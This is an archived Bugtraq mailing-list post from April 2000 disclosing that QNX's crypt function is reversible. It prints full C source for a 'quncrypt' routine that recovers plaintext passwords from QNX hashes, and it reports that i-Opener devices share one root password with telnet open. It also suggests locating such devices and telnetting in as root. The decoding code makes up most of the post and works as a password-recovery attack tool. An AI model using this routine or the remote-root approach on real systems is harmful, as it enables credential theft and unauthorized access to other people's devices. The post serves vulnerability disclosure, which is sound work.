[14531] in bugtraq
qnx crypt comprimised
daemon@ATHENA.MIT.EDU (Sean)
Sun Apr 16 21:43:00 2000
Message-Id: <20000415030309.6007.qmail@securityfocus.com>
Date: Sat, 15 Apr 2000 03:03:09 -0000
Reply-To: Sean <skasun@AZSTARNET.COM>
From: Sean <skasun@AZSTARNET.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
the crypt function for qnx turned out to a bit mixer, not a
hash function. It's now possible to extract plaintext from
the hashes.
On a related note, all IOpeners (running qnx) use the same
root password. Telnetd is running, and allows remote login
as root. This is a huge security hole, as you can search
uunet for Iopeners, and telnet in as root.
Source for the uncryptor is below:
static ascii2bin(short x)
{
if (x>='0' && x<'A')
return x-'0';
if (x>='A' && x<'a')
return (x-'A')+9;
return (x-'a')+26+9;
}
char bits[77];
char *quncrypt(char *pw)
{
static char newpw[14];
int i;
int j,rot;
int bit,ofs;
char salt[2];
int temp;
salt[0]=*pw++;
salt[1]=*pw++;
for (i=0;i<72;i++)
bits[i]=0;
for (i=0;i<12;i++)
newpw[i]=ascii2bin(pw[i]);
newpw[13]=0;
rot=(salt[1]*4-salt[0])%128; /* here's all the salt
does. A rotation */
for (i=0;i<12;i++)
{
for (j=0;j<6;j++)
{
bit=newpw[i]&(1<<j); /* move password into bit array
*/
bits[i*6+j]=bit?1:0;
}
}
while (rot--) /* do the big rotate */
{
bits[66]=bits[0];
for (i=0;i<=65;i++)
bits[i]=bits[i+1];
}
for (i=0;i<8;i++)
{
newpw[i]=0;
for (j=0;j<7;j++)
{
bit=bits[i+j*8];
newpw[i]|=(bit<<j); /* and compile the bit array back
*/
}
}
newpw[8]=0;
return newpw;
}
